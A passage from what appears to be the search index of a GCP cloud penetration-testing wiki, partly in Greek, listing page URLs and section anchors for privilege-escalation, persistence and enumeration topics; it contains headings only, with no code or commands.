ο-composer","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-composer-privesc.html#Εισαγωγή-plugins","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-composer-privesc.html#Εισαγωγή-Δεδομένων","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.html#gcp---container-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.html#container","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.html#containerclustersget","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.html#containerrolesescalate--containerclusterrolesescalate","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.html#containerrolesbind--containerclusterrolesbind","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.html#containercronjobscreate--containercronjobsupdate--containerdaemonsetscreate--containerdaemonsetsupdate--containerdeploymentscreate--containerdeploymentsupdate--containerjobscreate--containerjobsupdate--containerpodscreate--containerpodsupdate--containerreplicasetscreate--containerreplicasetsupdate--containerreplicationcontrollerscreate--containerreplicationcontrollersupdate--containerscheduledjobscreate--containerscheduledjobsupdate--containerstatefulsetscreate--containerstatefulsetsupdate","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.html#containersecretsget--containersecretslist","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.html#containerpodsexec","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.html#containerpodsportforward","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.html#containerserviceaccountscreatetoken","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.html#containermutatingwebhookconfigurationscreate--containermutatingwebhookconfigurationsupdate","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-dataproc-privesc.html#gcp-dataproc-privilege-escalation","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-dataproc-privesc.html#dataproc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-dataproc-privesc.html#dataprocclustersget-dataprocclustersuse-dataprocjobscreate-dataprocjobsget-dataprocjobslist-storageobjectscreate-storageobjectsget","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-deploymentmaneger-privesc.html#gcp---deploymentmaneger-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-deploymentmaneger-privesc.html#deploymentmanager","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-deploymentmaneger-privesc.html#deploymentmanagerdeploymentscreate","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-deploymentmaneger-privesc.html#deploymentmanagerdeploymentsupdate","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-deploymentmaneger-privesc.html#deploymentmanagerdeploymentssetiampolicy","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-deploymentmaneger-privesc.html#references","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.html#gcp---iam-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.html#iam","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.html#iamrolesupdate-iamrolesget","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.html#iamserviceaccountsgetaccesstoken-iamserviceaccountsget","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.html#iamserviceaccountkeyscreate","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.html#iamserviceaccountsimplicitdelegation","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.html#iamserviceaccountssignblob","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.html#iamserviceaccountssignjwt","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.html#iamserviceaccountssetiampolicy","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.html#iamserviceaccountsactas","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.html#iamserviceaccountsgetopenidtoken","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.html#Αναφορές","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-kms-privesc.html#gcp---kms-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-kms-privesc.html#kms","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-kms-privesc.html#cloudkmscryptokeyversionsusetodecrypt","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-kms-privesc.html#cloudkmscryptokeyssetiampolicy","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-kms-privesc.html#cloudkmscryptokeyversionsusetodecryptviadelegation","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-orgpolicy-privesc.html#gcp---orgpolicy-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-orgpolicy-privesc.html#orgpolicy","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-orgpolicy-privesc.html#orgpolicypolicyset","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-orgpolicy-privesc.html#Αναφορές","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-pubsub-privesc.html#gcp---pubsub-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-pubsub-privesc.html#pubsub","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-pubsub-privesc.html#pubsubsnapshotscreate","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-pubsub-privesc.html#pubsubsnapshotssetiampolicy","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-pubsub-privesc.html#pubsubsubscriptionscreate","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-pubsub-privesc.html#pubsubsubscriptionsupdate","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-pubsub-privesc.html#pubsubsubscriptionsconsume","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-pubsub-privesc.html#pubsubsubscriptionssetiampolicy","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-resourcemanager-privesc.html#gcp---resourcemanager-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-resourcemanager-privesc.html#resourcemanager","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-resourcemanager-privesc.html#resourcemanagerorganizationssetiampolicy","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-resourcemanager-privesc.html#resourcemanagerfolderssetiampolicy","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-resourcemanager-privesc.html#resourcemanagerprojectssetiampolicy","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-run-privesc.html#gcp---run-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-run-privesc.html#cloud-run","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-run-privesc.html#runservicescreate--iamserviceaccountsactas--runroutesinvoke","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-run-privesc.html#runservicesupdate--iamserviceaccountsactas","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-run-privesc.html#runservicessetiampolicy","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-run-privesc.html#runjobscreate-runjobsrun-iamserviceaccountsactasrunjobsget","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-run-privesc.html#runjobsupdaterunjobsruniamserviceaccountsactasrunjobsget","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-run-privesc.html#runjobssetiampolicy","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-run-privesc.html#runjobsrun-runjobsrunwithoverrides-runjobsget","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-run-privesc.html#Αναφορές","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-secretmanager-privesc.html#gcp---secretmanager-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-secretmanager-privesc.html#secretmanager","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-secretmanager-privesc.html#secretmanagerversionsaccess","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-secretmanager-privesc.html#secretmanagersecretssetiampolicy","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-serviceusage-privesc.html#gcp---serviceusage-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-serviceusage-privesc.html#serviceusage","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-serviceusage-privesc.html#serviceusageapikeyscreate","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-serviceusage-privesc.html#serviceusageapikeyslist","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-serviceusage-privesc.html#serviceusageservicesenable----serviceusageservicesuse","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-serviceusage-privesc.html#references","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-sourcerepos-privesc.html#gcp---sourcerepos-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-sourcerepos-privesc.html#Αποθετήρια-Πηγών","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-sourcerepos-privesc.html#sourcereposget","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-sourcerepos-privesc.html#sourcereposupdate","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-sourcerepos-privesc.html#sourcerepossetiampolicy","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-sourcerepos-privesc.html#Πρόσβαση-σε-μυστικά","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-sourcerepos-privesc.html#Προσθήκη-κλειδιών-ssh","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-sourcerepos-privesc.html#Χειροκίνητα-Διαπιστευτήρια","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-sourcerepos-privesc.html#sourcereposupdateprojectconfig","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-storage-privesc.html#gcp---storage-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-storage-privesc.html#storage","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-storage-privesc.html#storageobjectsget","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-storage-privesc.html#storageobjectssetiampolicy","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-storage-privesc.html#storagebucketssetiampolicy","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-storage-privesc.html#storagehmackeyscreate","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-storage-privesc.html#storageobjectscreate-storageobjectsdelete--Δικαιώματα-Εγγραφής-Αποθήκης","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-storage-privesc.html#composer","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-storage-privesc.html#cloud-functions","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-storage-privesc.html#app-engine","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-storage-privesc.html#gcr","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-storage-privesc.html#Αναφορές","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-workflows-privesc.html#gcp---workflows-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-workflows-privesc.html#workflows","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-workflows-privesc.html#workflowsworkflowscreate-iamserviceaccountsactas-workflowsexecutionscreate-workflowsworkflowsget-workflowsoperationsget","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-workflows-privesc.html#Διαρροή-oidc-token-και-oauth","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-workflows-privesc.html#workflowsworkflowsupdate-","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-misc-perms-privesc.html#gcp---Γενικές-Άδειες-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-misc-perms-privesc.html#Γενικές-Ενδιαφέρουσες-Άδειες","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-misc-perms-privesc.html#setiampolicy","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-misc-perms-privesc.html#create-update","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-misc-perms-privesc.html#serviceaccount","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-network-docker-escape.html#gcp---network-docker-escape","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-network-docker-escape.html#Αρχική-Κατάσταση","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-network-docker-escape.html#Εξήγηση-Επίθεσης","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-network-docker-escape.html#Τεχνική-Διαφυγής","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-network-docker-escape.html#Αναφορές","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-local-privilege-escalation-ssh-pivoting.html#gcp---τοπική-εκμετάλλευση-δικαιωμάτων-ssh-pivoting","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-local-privilege-escalation-ssh-pivoting.html#Διαβάστε-τα-σενάρια","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-local-privilege-escalation-ssh-pivoting.html#Προσαρμοσμένα-Μεταδεδομένα","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-local-privilege-escalation-ssh-pivoting.html#Κατάχρηση-δικαιωμάτων-iam","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-local-privilege-escalation-ssh-pivoting.html#Αναζητήστε-Κλειδιά-στο-σύστημα-αρχείων","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-local-privilege-escalation-ssh-pivoting.html#Περισσότερες-κανονικές-εκφράσεις-για-api-keys","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-local-privilege-escalation-ssh-pivoting.html#Αναφορές","pentesting-cloud/gcp-security/gcp-persistence/index.html#gcp---Επιμονή","pentesting-cloud/gcp-security/gcp-persistence/gcp-api-keys-persistence.html#gcp---api-keys-persistence","pentesting-cloud/gcp-security/gcp-persistence/gcp-api-keys-persistence.html#api-keys","pentesting-cloud/gcp-security/gcp-persistence/gcp-api-keys-persistence.html#Δημιουργία-νέων--Πρόσβαση-σε-υπάρχοντα","pentesting-cloud/gcp-security/gcp-persistence/gcp-app-engine-persistence.html#gcp---app-engine-persistence","pentesting-cloud/gcp-security/gcp-persistence/gcp-app-engine-persistence.html#app-engine","pentesting-cloud/gcp-security/gcp-persistence/gcp-app-engine-persistence.html#Τροποποίηση-κώδικα","pentesting-cloud/gcp-security/gcp-persistence/gcp-app-engine-persistence.html#Επιμονή-παλιάς-έκδοσης","pentesting-cloud/gcp-security/gcp-persistence/gcp-artifact-registry-persistence.html#gcp---artifact-registry-persistence","pentesting-cloud/gcp-security/gcp-persistence/gcp-artifact-registry-persistence.html#artifact-registry","pentesting-cloud/gcp-security/gcp-persistence/gcp-artifact-registry-persistence.html#dependency-confusion","pentesting-cloud/gcp-security/gcp-persistence/gcp-bigquery-persistence.html#gcp---bigquery-persistence","pentesting-cloud/gcp-security/gcp-persistence/gcp-bigquery-persistence.html#bigquery","pentesting-cloud/gcp-security/gcp-persistence/gcp-bigquery-persistence.html#Παροχή-περαιτέρω-πρόσβασης","pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-functions-persistence.html#gcp---Συνέχεια-cloud-functions","pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-functions-persistence.html#cloud-functions","pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-functions-persistence.html#Τεχνικές-Συνέχειας","pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-run-persistence.html#gcp---cloud-run-persistence","pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-run-persistence.html#cloud-run","pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-run-persistence.html#backdoored-revision","pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-run-persistence.html#publicly-accessible-service","pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-run-persistence.html#backdoored-service-or-job","pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-shell-persistence.html#gcp---cloud-shell-persistence","pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-shell-persistence.html#cloud-shell","pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-shell-persistence.html#persistent-backdoor","pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-shell-persistence.html#Αναφορές","pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-sql-persistence.html#gcp---cloud-sql-persistence","pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-sql-persistence.html#cloud-sql","pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-sql-persistence.html#Εκθέστε-τη-βάση-δεδομένων-και-προσθέστε-τη-διεύθυνση-ip-σας-στη-λευκή-λίστα","pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-sql-persistence.html#Δημιουργία-νέου-χρήστη--Ενημέρωση-κωδικού-πρόσβασης-χρηστών--Λήψη-κωδικού-πρόσβασης-ενός-χρήστη","pentesting-cloud/gcp-security/gcp-persistence/gcp-compute-persistence.html#gcp---compute-persistence","pentesting-cloud/gcp-security/gcp-persistence/gcp-compute-persistence.html#compute","pentesting-cloud/gcp-security/gcp-persistence/gcp-compute-persistence.html#Εκμετάλλευση-της-επιμονής-σε-instances--αντίγραφα-ασφαλείας","pentesting-cloud/gcp-security/gcp-persistence/gcp-dataflow-persistence.html#gcp---dataflow-persistence","pentesting-cloud/gcp-security/gcp-persistence/gcp-dataflow-persistence.html#dataflow","pentesting-cloud/gcp-security/gcp-persistence/gcp-dataflow-persistence.html#Αόρατη-επιμονή-σε-ενσωματωμένο-κοντέινερ","pentesting-cloud/gcp-security/gcp-persistence/gcp-filestore-persistence.html#gcp---filestore-persistence","pentesting-cloud/gcp-security/gcp-persistence/gcp-filestore-persistence.html#filestore","pentesting-cloud/gcp-security/gcp-persistence/gcp-filestore-persistence.html#Δώστε-ευρύτερη-πρόσβαση-και-προνόμια-σε-ένα-mount","pentesting-cloud/gcp-security/gcp-persistence/gcp-logging-persistence.html#gcp---Διαρκής-Καταγραφή","pentesting-cloud/gcp-security/gcp-persistence/gcp-logging-persistence.html#Καταγραφή","pentesting-cloud/gcp-security/gcp-persistence/gcp-logging-persistence.html#loggingsinkscreate","pentesting-cloud/gcp-security/gcp-persistence/gcp-secret-manager-persistence.html#gcp---Διαχείριση-Μυστικών-Επιμονή","pentesting-cloud/gcp-security/gcp-persistence/gcp-secret-manager-persistence.html#Διαχείριση-Μυστικών","pentesting-cloud/gcp-security/gcp-persistence/gcp-secret-manager-persistence.html#Κακή-χρήση-περιστροφής","pentesting-cloud/gcp-security/gcp-persistence/gcp-storage-persistence.html#gcp---Αποθήκευση-Επιμονής","pentesting-cloud/gcp-security/gcp-persistence/gcp-storage-persistence.html#Αποθήκευση","pentesting-cloud/gcp-security/gcp-persistence/gcp-storage-persistence.html#storagehmackeyscreate","pentesting-cloud/gcp-security/gcp-persistence/gcp-storage-persistence.html#Δώστε-Δημόσια-Πρόσβαση","pentesting-cloud/gcp-security/gcp-persistence/gcp-non-svc-persistance.html#gcp---Διατήρηση-token","pentesting-cloud/gcp-security/gcp-persistence/gcp-non-svc-persistance.html#tokens-Αυauthenticated-Χρήστη","pentesting-cloud/gcp-security/gcp-persistence/gcp-non-svc-persistance.html#auth-flow","pentesting-cloud/gcp-security/gcp-persistence/gcp-non-svc-persistance.html#oauth-scopes","pentesting-cloud/gcp-security/gcp-persistence/gcp-non-svc-persistance.html#Λογαριασμοί-Υπηρεσιών","pentesting-cloud/gcp-security/gcp-persistence/gcp-non-svc-persistance.html#Μεταδεδομένα","pentesting-cloud/gcp-security/gcp-persistence/gcp-non-svc-persistance.html#Αντιμετώπιση","pentesting-cloud/gcp-security/gcp-persistence/gcp-non-svc-persistance.html#Αναφορές","pentesting-cloud/gcp-security/gcp-services/index.html#gcp---Υπηρεσίες","pentesting-cloud/gcp-security/gcp-services/gcp-ai-platform-enum.html#gcp---ai-platform-enum","pentesting-cloud/gcp-security/gcp-services/gcp-ai-platform-enum.html#ai-platform","pentesting-cloud/gcp-security/gcp-services/gcp-api-keys-enum.html#gcp---api-keys-enum","pentesting-cloud/gcp-security/gcp-services/gcp-api-keys-enum.html#basic-information","pentesting-cloud/gcp-security/gcp-services/gcp-api-keys-enum.html#restrictions","pentesting-cloud/gcp-security/gcp-services/gcp-api-keys-enum.html#enumeration","pentesting-cloud/gcp-security/gcp-services/gcp-api-keys-enum.html#privilege-escalation--post-exploitation","pentesting-cloud/gcp-security/gcp-services/gcp-api-keys-enum.html#unauthenticated-enum","pentesting-cloud/gcp-security/gcp-services/gcp-api-keys-enum.html#persistence","pentesting-cloud/gcp-security/gcp-services/gcp-app-engine-enum.html#gcp---app-engine-enum","pentesting-cloud/gcp-security/gcp-services/gcp-app-engine-enum.html#basic-information","pentesting-cloud/gcp-security/gcp-services/gcp-app-engine-enum.html#firewall","pentesting-cloud/gcp-security/gcp-services/gcp-app-engine-enum.html#sa","pentesting-cloud/gcp-security/gcp-services/gcp-app-engine-enum.html#storage","pentesting-cloud/gcp-security/gcp-services/gcp-app-engine-enum.html#containers","pentesting-cloud/gcp-security/gcp-services/gcp-app-engine-enum.html#urls--regions","pentesting-cloud/gcp-security/gcp-services/gcp-app-engine-enum.html#enumeration","pentesting-cloud/gcp-security/gcp-services/gcp-app-engine-enum.html#Ανάβαση-Δικαιωμάτων","pentesting-cloud/gcp-security/gcp-services/gcp-app-engine-enum.html#Μη-Αυθεντικοποιημένη-enum","pentesting-cloud/gcp-security/gcp-services/gcp-app-engine-enum.html#Μετά-την-Εκμετάλλευση","pentesting-cloud/gcp-security/gcp-services/gcp-app-engine-enum.html#Επιμονή","pentesting-cloud/gcp-security/gcp-services/gcp-artifact-registry-enum.html#gcp---enum-Αρχείου-Τέχνης","pentesting-cloud/gcp-security/gcp-services/gcp-artifact-registry-enum.html#Βασικές-Πληροφορίες","pentesting-cloud/gcp-security/gcp-services/gcp-artifact-registry-enum.html#Μορφές-και-Λειτουργίες","pentesting-cloud/gcp-security/gcp-services/gcp-artifact-registry-enum.html#Κρυπτογράφηση","pentesting-cloud/gcp-security/gcp-services/gcp-artifact-registry-enum.html#Πολιτικές-Καθαρισμού","pentesting-cloud/gcp-security/gcp-services/gcp-artifact-registry-enum.html#Σάρωση-Ευπαθειών","pentesting-cloud/gcp-security/gcp-services/gcp-artifact-registry-enum.html#Αριθμητική","pentesting-cloud/gcp-security/gcp-services/gcp-artifact-registry-enum.html#Ανάβαση-Δικαιωμάτων","pentesting-cloud/gcp-security/gcp-services/gcp-artifact-registry-enum.html#Μη-Αυθεντικοποιημένη-Πρόσβαση","pentesting-cloud/gcp-security/gcp-services/gcp-artifact-registry-enum.html#Μετά-την-Εκμετάλλευση","pentesting-cloud/gcp-security/gcp-services/gcp-artifact-registry-enum.html#Επιμονή","pentesting-cloud/gcp-security/gcp-services/gcp-batch-enum.html#gcp---batch-enum","pentesting-cloud/gcp-security/gcp-services/gcp-batch-enum.html#basic-information","pentesting-cloud/gcp-security/gcp-services/gcp-batch-enum.html#service-account","pentesting-cloud/gcp-security/gcp-services/gcp-batch-enum.html#enumeration","pentesting-cloud/gcp-security/gcp-services/gcp-batch-enum.html#Ανάβαση-Δικαιωμάτων","pentesting-cloud/gcp-security/gcp-services/gcp-bigquery-enum.html#gcp---bigquery-enum","pentesting-cloud/gcp-security/gcp-services/gcp-bigquery-enum.html#basic-information","pentesting-cloud/gcp-security/gcp-services/gcp-bigquery-enum.html#encryption","pentesting-cloud/gcp-security/gcp-services/gcp-bigquery-enum.html#expiration","pentesting-cloud/gcp-security/gcp-services/gcp-bigquery-enum.html#external-sources","pentesting-cloud/gcp-security/gcp-services/gcp-bigquery-enum.html#dataset-acls","pentesting-cloud/gcp-security/gcp-services/gcp-bigquery-enum.html#Έλεγχος-Πρόσβασης-Γραμμών-Πίνακα","pentesting-cloud/gcp-security/gcp-services/gcp-bigquery-enum.html#Έλεγχος-Πρόσβασης-Στηλών","pentesting-cloud/gcp-security/gcp-services/gcp-bigquery-enum.html#Καταμέτρηση","pentesting-cloud/gcp-security/gcp-services/gcp-bigquery-enum.html#bigquery-sql-injection","pentesting-cloud/gcp-security/gcp-services/gcp-bigquery-enum.html#Κλιμάκωση-Δικαιωμάτων--Μετά-την-Εκμετάλλευση","pentesting-cloud/gcp-security/gcp-services/gcp-bigquery-enum.html#Επιμονή","pentesting-cloud/gcp-security/gcp-services/gcp-bigquery-enum.html#Αναφορές","pentesting-cloud/gcp-security/gcp-services/gcp-bigtable-enum.html#gcp---bigtable-enum","pentesting-cloud/gcp-security/gcp-services/gcp-bigtable-enum.html#bigtable","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-build-enum.html#gcp---cloud-build-enum","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-build-enum.html#basic-information","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-build-enum.html#events","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-build-enum.html#execution","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-build-enum.html#sa-permissions","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-build-enum.html#approvals","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-build-enum.html#pr-approvals","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-build-enum.html#connections--repositories","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-build-enum.html#connect-a-repository","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-build-enum.html#storage","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-build-enum.html#get-shell","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-build-enum.html#enumeration","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-build-enum.html#Ανάβαση-Δικαιωμάτων","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-build-enum.html#Μη-Αυθεντικοποιημένη-Πρόσβαση","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-build-enum.html#Μετά-την-Εκμετάλλευση","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-functions-enum.html#gcp---cloud-functions-enum","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-functions-enum.html#cloud-functions","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-functions-enum.html#storage","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-functions-enum.html#artifact-registry","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-functions-enum.html#sa","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-functions-enum.html#triggers-url--authentication","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-functions-enum.html#inside-the-cloud-function","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-functions-enum.html#enumeration","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-functions-enum.html#Ανάβαση-Δικαιωμάτων","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-functions-enum.html#Μη-Αυθεντικοποιημένη-Πρόσβαση","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-functions-enum.html#Μετά-την-Εκμετάλλευση","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-functions-enum.html#Επιμονή","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-functions-enum.html#Αναφορές","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-run-enum.html#gcp---cloud-run-enum","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-run-enum.html#cloud-run","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-run-enum.html#Υπηρεσίες-και-εργασίες","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-run-enum.html#Υπηρεσία-cloud-run","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-run-enum.html#Σχετικές-λεπτομέρειες","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-run-enum.html#enumeration","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-run-enum.html#cloud-run-jobs","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-run-enum.html#enumeration-1","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-run-enum.html#Ανάβαση-Δικαιωμάτων","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-run-enum.html#Μη-Αυθεντικοποιημένη-Πρόσβαση","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-run-enum.html#Μετά-την-Εκμετάλλευση","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-run-enum.html#Επιμονή","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-run-enum.html#Αναφορές","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-shell-enum.html#gcp---cloud-shell-enum","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-shell-enum.html#basic-information","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-shell-enum.html#post-exploitation","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-shell-enum.html#persistence","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-sql-enum.html#gcp---cloud-sql-enum","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-sql-enum.html#basic-information","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-sql-enum.html#password","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-sql-enum.html#zone-availability","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-sql-enum.html#encryption","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-sql-enum.html#connections","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-sql-enum.html#data-protection","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-sql-enum.html#enumeration","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-sql-enum.h